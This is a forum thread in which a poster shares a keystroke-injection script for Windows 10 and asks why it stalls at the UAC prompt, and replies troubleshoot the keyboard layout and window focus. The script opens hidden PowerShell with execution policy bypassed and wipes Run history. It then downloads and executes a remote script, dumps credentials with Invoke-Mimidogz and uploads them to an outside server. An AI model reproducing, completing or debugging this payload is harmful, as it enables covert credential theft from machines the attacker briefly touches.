Jump to content

UAC Win 10 Help


Recommended Posts

below is my code that i piece together from other scripts including the Mr. Robot cred dump..... again i take no credit in this but i need help.

Win 10 machine with UAC enabled

When i run the script it doesnt get pass the UAC yes or no box .... any ideas

I have the ALT y command in there during testing so its not bot the ALT y or LEFTARROW

 

Thanks in advance

DELAY 1000

GUI r

DELAY 300

STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=20&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"

ENTER

DELAY 500

REM ALT y

LEFTARROW

DELAY 300

ENTER

DELAY 300

STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://www.mysite/md.ps1'); $o = Invoke-Mimidogz -DumpCred; (New-Object Net.WebClient).UploadString('http://www.mysite/rx.php', $o)"

ENTER

Link to comment
Share on other sites

ALT y only works if you have a american keyboard/keyboad mapping because "yes" starts with a "y". For German it has to be ALT j it just depends on your language settings. have you tried doing it manually by hand and see if that works?

Link to comment
Share on other sites

yes i did try manually.  What appears to happen that after the first string completes it opens the UAC dialog box but doesnt work after that.  I have to physically click the dialog box then press ALT y myself.....almost like the UAC box isnt the active window if that makes sense.  I thought maybe it was the delay that was the problem but i set it to 10000 and still woulldnt work.  I am using US keyboard

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...